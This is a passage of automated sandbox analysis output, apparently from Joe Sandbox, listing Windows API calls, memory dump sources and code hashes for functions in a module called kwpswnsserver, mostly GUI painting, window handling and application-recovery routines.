                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: RegisterApplicationRecoveryCallback$kernel32.dll
                                                                  • API String ID: 2061474489-202725706
                                                                  • Opcode ID: 32d2a12feb255ed5469a906d811cdaf9b916fe063488888e6abca265770f0e65
                                                                  • Instruction ID: f60822219161ad6f1aed9819e49c38d3e579b40e495a0bef529dd5a7b91e906c
                                                                  • Opcode Fuzzy Hash: 32d2a12feb255ed5469a906d811cdaf9b916fe063488888e6abca265770f0e65
                                                                  • Instruction Fuzzy Hash: 16F0907664132BAB8F252FB88D1CA9A3BB8FB05755300C914FD0DE6604D730D8038BA0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(shell32.dll), ref: 6C8A63BC
                                                                  • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 6C8A63CC
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A63D5
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A63E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                  • API String ID: 2061474489-2320870614
                                                                  • Opcode ID: 745ccf668a49560b54cf25ed99e0e7c05eba98d9277cb2664494f0fd9b426924
                                                                  • Instruction ID: 2c6eb516f511374f33ddea46bea44ac382528eae0eae12f931f3a73ad03fdfdb
                                                                  • Opcode Fuzzy Hash: 745ccf668a49560b54cf25ed99e0e7c05eba98d9277cb2664494f0fd9b426924
                                                                  • Instruction Fuzzy Hash: A1F0907164233BAF8F256FA8CD1C95B3BB8BB05745740C910FC09D2604D734C8038BA0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(uxtheme.dll,?,?,6C89DE4D,?,00000001,E343E0B4), ref: 6C8A6676
                                                                  • GetProcAddress.KERNEL32(00000000,EndBufferedPaint), ref: 6C8A6686
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C89DE4D,?,00000001,E343E0B4), ref: 6C8A668F
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C89DE4D,?,00000001,E343E0B4), ref: 6C8A669D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: EndBufferedPaint$uxtheme.dll
                                                                  • API String ID: 2061474489-2993015961
                                                                  • Opcode ID: b8977f43e9205cc55b2bfe9a254085e07d8826ab66d7dac75d41991bf59092ea
                                                                  • Instruction ID: 4976f8b670418e60b5ff5f4ec003df6d16da324ffea142312585aa1d68358ab1
                                                                  • Opcode Fuzzy Hash: b8977f43e9205cc55b2bfe9a254085e07d8826ab66d7dac75d41991bf59092ea
                                                                  • Instruction Fuzzy Hash: F6F05E7164133BEF8F252AA9CD1C94A3BB8AB066553408925FD19D7624EB308C438AA4
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C8899A3,?,?), ref: 6C8A61EB
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 6C8A61FB
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C8899A3,?,?), ref: 6C8A6204
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C8899A3,?,?), ref: 6C8A6212
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: RegisterApplicationRestart$kernel32.dll
                                                                  • API String ID: 2061474489-1259503209
                                                                  • Opcode ID: 69a32966f5368f0aea2cda25c87aea173b131ffa60d08f49c25b303a99b088ea
                                                                  • Instruction ID: 4584df9d4f4ee840b016aac63431ab9eea507ac1dd2df16b60c9a87a3fe93bef
                                                                  • Opcode Fuzzy Hash: 69a32966f5368f0aea2cda25c87aea173b131ffa60d08f49c25b303a99b088ea
                                                                  • Instruction Fuzzy Hash: B6F0823164533BAB8F252BA88D1C98A3BB8FB067493408525FD0DE3604DB30D8038BA4
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C8A6360
                                                                  • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 6C8A6370
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A6379
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A6387
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: ChangeWindowMessageFilter$user32.dll
                                                                  • API String ID: 2061474489-2498399450
                                                                  • Opcode ID: dfcd67e5186781774cd74ea6e319182080d5c64e08e58c7be19df30a87881bd4
                                                                  • Instruction ID: c298575d33e419a7613f1f7ae628e6d2e03605fe878a9adc16ec15ac98d66211
                                                                  • Opcode Fuzzy Hash: dfcd67e5186781774cd74ea6e319182080d5c64e08e58c7be19df30a87881bd4
                                                                  • Instruction Fuzzy Hash: B7F089357423369F9F252BB9CD1C95A3BB8FB066953408911FC09D3604E731C40396A0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C8899DE,00000000), ref: 6C8A62AF
                                                                  • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 6C8A62BF
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C8899DE,00000000), ref: 6C8A62C8
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C8899DE,00000000), ref: 6C8A62D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: ApplicationRecoveryInProgress$kernel32.dll
                                                                  • API String ID: 2061474489-2899047487
                                                                  • Opcode ID: 6d921090adf9437cae0bb420df7a02d9d1a1526ff5de26662e94f14eb8c3b185
                                                                  • Instruction ID: 1b1ddbd14d034d02c4b1b53dc5bb42af1355737bd2224b1e0b7df84c9a5d4b39
                                                                  • Opcode Fuzzy Hash: 6d921090adf9437cae0bb420df7a02d9d1a1526ff5de26662e94f14eb8c3b185
                                                                  • Instruction Fuzzy Hash: F0F03E35741337AB9F2527BC8D1C55A37B8BB057597808529FC05E3E08DB74C5134790
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C889A21,00000001), ref: 6C8A630B
                                                                  • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 6C8A631B
                                                                  • EncodePointer.KERNEL32(00000000,?,6C889A21,00000001), ref: 6C8A6324
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C889A21,00000001), ref: 6C8A6332
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: ApplicationRecoveryFinished$kernel32.dll
                                                                  • API String ID: 2061474489-1962646049
                                                                  • Opcode ID: 2fb56e9e8f3c88b546aa4a021691dd3a76ae796e6fb5ac45e281720535a2964d
                                                                  • Instruction ID: a3017ec0c184710ade7f14462f1dad760aa054dc038437be1126c7269ab29d9a
                                                                  • Opcode Fuzzy Hash: 2fb56e9e8f3c88b546aa4a021691dd3a76ae796e6fb5ac45e281720535a2964d
                                                                  • Instruction Fuzzy Hash: 2EF06C7170633B6B8F252BB98D1C95A7BBCFE0564A340C911FC0AD3604DB30C50347A0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(shell32.dll,?,6C88FE8C,?,?,6C891542,000FC000,00000010,00000048,6C891721,?,?,?,?,00000000), ref: 6C8A6483
                                                                  • GetProcAddress.KERNEL32(00000000,InitNetworkAddressControl), ref: 6C8A6493
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C891542,000FC000,00000010,00000048,6C891721,?,?,?,?,00000000,?,6C8919D1,?), ref: 6C8A649C
                                                                  • DecodePointer.KERNEL32(00000000,?,6C88FE8C,?,?,6C891542,000FC000,00000010,00000048,6C891721,?,?,?,?,00000000), ref: 6C8A64AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: InitNetworkAddressControl$shell32.dll
                                                                  • API String ID: 2061474489-1950653938
                                                                  • Opcode ID: 7187456e946026d03d3d2c7b71957503825fb2d9a8eb5b1f8e9567fcfaeace19
                                                                  • Instruction ID: 32c1a36c1f6b8900a48c006763060368b8876d872b8ddd29155b5ecb48a5d629
                                                                  • Opcode Fuzzy Hash: 7187456e946026d03d3d2c7b71957503825fb2d9a8eb5b1f8e9567fcfaeace19
                                                                  • Instruction Fuzzy Hash: E3E03035707B375F9B386AB89D1C55B37B8AB06655340C951FC09D2604D724894386A4
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(uxtheme.dll,?,6C89EEEA,?,?,6C89E183,E343E0B4,?,?,?,Function_0019BE40,000000FF), ref: 6C8A65B9
                                                                  • GetProcAddress.KERNEL32(00000000,BufferedPaintUnInit), ref: 6C8A65C9
                                                                  • EncodePointer.KERNEL32(00000000,?,6C89EEEA,?,?,6C89E183,E343E0B4,?,?,?,Function_0019BE40,000000FF), ref: 6C8A65D2
                                                                  • DecodePointer.KERNEL32(00000000,?,6C89EEEA,?,?,6C89E183,E343E0B4,?,?,?,Function_0019BE40,000000FF), ref: 6C8A65E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: BufferedPaintUnInit$uxtheme.dll
                                                                  • API String ID: 2061474489-1501038116
                                                                  • Opcode ID: 758c5297f3ab81f8de95bb0d969f89d0143c6a532fa0617dd34c4024f29256c7
                                                                  • Instruction ID: f2f5eca77440fedaafc4da4d11a63bb4123dbb1978c6e690294eaa96f5027a89
                                                                  • Opcode Fuzzy Hash: 758c5297f3ab81f8de95bb0d969f89d0143c6a532fa0617dd34c4024f29256c7
                                                                  • Instruction Fuzzy Hash: 24E06531B413339F8F2977B8AD1C55A36B4BB466593458625FC15D3A0CDB24C9438BE4
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(uxtheme.dll,?,6C89DD38,?,?,?,?,?,?,?,?,00000008), ref: 6C8A6564
                                                                  • GetProcAddress.KERNEL32(00000000,BufferedPaintInit), ref: 6C8A6574
                                                                  • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000008), ref: 6C8A657D
                                                                  • DecodePointer.KERNEL32(00000000,?,6C89DD38,?,?,?,?,?,?,?,?,00000008), ref: 6C8A658B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: BufferedPaintInit$uxtheme.dll
                                                                  • API String ID: 2061474489-1331937065
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(comctl32.dll), ref: 6C8A691E
                                                                  • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 6C8A692E
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A6937
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A6949
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: TaskDialogIndirect$comctl32.dll
                                                                  • API String ID: 2061474489-2809879075
                                                                  APIs
                                                                  • __allrem.LIBCMT ref: 6C9D22F1
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D230D
                                                                  • __allrem.LIBCMT ref: 6C9D2324
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D2342
                                                                  • __allrem.LIBCMT ref: 6C9D2359
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D2377
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                  • String ID:
                                                                  • API String ID: 1992179935-0
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8C2370
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8C2384
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C23AD
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C8C23C1
                                                                    • Part of subcall function 6C88AC28: GetParent.USER32(?), ref: 6C88AC32
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C8C2423
                                                                  • GetFocus.USER32 ref: 6C8C254A
                                                                    • Part of subcall function 6C8E7FAA: __EH_prolog3_GS.LIBCMT ref: 6C8E7FB4
                                                                    • Part of subcall function 6C8E7FAA: GetWindowRect.USER32(?,?), ref: 6C8E8048
                                                                    • Part of subcall function 6C8E7FAA: SetRect.USER32(?,00000000,00000000,?,?), ref: 6C8E8069
                                                                    • Part of subcall function 6C8E7FAA: CreateCompatibleDC.GDI32(?), ref: 6C8E8075
                                                                    • Part of subcall function 6C8E7FAA: CreateCompatibleBitmap.GDI32(?,?,00000128), ref: 6C8E809F
                                                                    • Part of subcall function 6C8E7FAA: GetWindowRect.USER32(?,?), ref: 6C8E80F4
                                                                    • Part of subcall function 6C8E7FAA: GetClientRect.USER32(?,?), ref: 6C8E8101
                                                                  Similarity
                                                                  • API ID: Rect$Window$CompatibleCreateMessageSend$BitmapClientCursorFocusH_prolog3_Parent
                                                                  • String ID:
                                                                  • API String ID: 2914356772-0
                                                                  APIs
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 6C8C08F3
                                                                    • Part of subcall function 6C880847: __EH_prolog3.LIBCMT ref: 6C88084E
                                                                  • GetClientRect.USER32(?,?), ref: 6C8C0935
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD00), ref: 6C883F20
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD08), ref: 6C883F2D
                                                                  • IsWindowVisible.USER32(?), ref: 6C8C0B6E
                                                                  • SetTimer.USER32(00000000,0000EC15,00000000), ref: 6C8C0B91
                                                                  • InvalidateRect.USER32(?,00000000,00000001,6CA57AD8,00000000,00000000,00000000,00000000,00000053), ref: 6C8C0C00
                                                                  • UpdateWindow.USER32(?), ref: 6C8C0C09
                                                                  Similarity
                                                                  • API ID: Client$RectScreenWindow$CursorH_prolog3InvalidateLoadTimerUpdateVisible
                                                                  • String ID:
                                                                  • API String ID: 3378768144-0
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8D0572
                                                                  • InflateRect.USER32(?,000000FF,00000000), ref: 6C8D0592
                                                                  • InflateRect.USER32(?,000000FF,000000FE), ref: 6C8D05B7
                                                                  • FillRect.USER32(?,?,?), ref: 6C8D05D8
                                                                  • __EH_prolog3.LIBCMT ref: 6C8D0730
                                                                  • GetTextColor.GDI32(?), ref: 6C8D0741
                                                                    • Part of subcall function 6C89F0E3: __EH_prolog3.LIBCMT ref: 6C89F0EA
                                                                    • Part of subcall function 6C89F0E3: SysStringLen.OLEAUT32(?), ref: 6C89F129
                                                                    • Part of subcall function 6C89F0E3: SysStringLen.OLEAUT32(?), ref: 6C89F148
                                                                    • Part of subcall function 6C89F0E3: SysFreeString.OLEAUT32(?), ref: 6C89F1CF
                                                                  Similarity
                                                                  • API ID: RectString$H_prolog3Inflate$ColorFillFreeH_prolog3_Text
                                                                  • String ID:
                                                                  • API String ID: 1455384773-0
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 6C8B4239
                                                                  • GetParent.USER32(?), ref: 6C8B4258
                                                                  • GetParent.USER32(?), ref: 6C8B4267
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505,6CA0A554,00000000), ref: 6C8B42CD
                                                                  • GetParent.USER32(?), ref: 6C8B42D6
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505,00000000), ref: 6C8B42FD
                                                                  Similarity
                                                                  • API ID: Parent$RedrawWindow
                                                                  • String ID:
                                                                  • API String ID: 2946272266-0
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 6C8C8471
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 6C8C84DC
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C8C84F9
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6C8C8538
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6C8C8597
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6C8C85BA
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringWide
                                                                  • String ID:
                                                                  • API String ID: 2829165498-0
                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 6C8B1044
                                                                  • SendMessageW.USER32(?,0000040C,00000000,00000000), ref: 6C8B1080
                                                                  • SendMessageW.USER32(00000000,0000041C,00000000,?), ref: 6C8B10B3
                                                                  • SetRectEmpty.USER32(?), ref: 6C8B1119
                                                                  • SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 6C8B1175
                                                                  • RedrawWindow.USER32(00000000,00000000,00000000,00000505), ref: 6C8B11A4
                                                                  Similarity
                                                                  • API ID: MessageSend$EmptyParentRectRedrawWindow
                                                                  • String ID:
                                                                  • API String ID: 3879113052-0
                                                                  • Opcode ID: 4e859cb3a577d2afb15555b12e34613c4c725727281de741c0bd828fb5841c4c
                                                                  • Instruction ID: 685d04c9c8c76599bfce7008eed911601b94f2bcd7529104292847a9058b3dd7
                                                                  • Opcode Fuzzy Hash: 4e859cb3a577d2afb15555b12e34613c4c725727281de741c0bd828fb5841c4c
                                                                  • Instruction Fuzzy Hash: 78517071F016199FDB28DF64C994BADBBB5FF48304F204169E516AB790DB30A901CF80
                                                                  APIs
                                                                  • CallNextHookEx.USER32(00000000,?,?), ref: 6C8B63AF
                                                                  • WindowFromPoint.USER32(?,?), ref: 6C8B63D9
                                                                  • ScreenToClient.USER32(00000020,00000200), ref: 6C8B640F
                                                                  • GetParent.USER32(00000020), ref: 6C8B6476
                                                                  • UpdateWindow.USER32(?), ref: 6C8B64DC
                                                                  • SendMessageW.USER32(?,00000100,00000024,00000000), ref: 6C8B655A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallClientFromHookMessageNextParentPointScreenSendUpdate
                                                                  • String ID:
                                                                  • API String ID: 4074787488-0
                                                                  • Opcode ID: 0f00ff0d6099f806c8ecd9c16fae8547fd9586c46568107fd03f04b14288ac5c
                                                                  • Instruction ID: 779a30d22402a899e0db0ff095e3316770705ffbad8f80e1c05c487c67a8323c
                                                                  • Opcode Fuzzy Hash: 0f00ff0d6099f806c8ecd9c16fae8547fd9586c46568107fd03f04b14288ac5c
                                                                  • Instruction Fuzzy Hash: FC51D135701306AFDF2C9F58CE44AAA7BB5FF49318F208969E825E7790DB319951CB40
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C8925D2
                                                                  • IsWindow.USER32(?), ref: 6C89264D
                                                                  • ClientToScreen.USER32(?,?), ref: 6C89265E
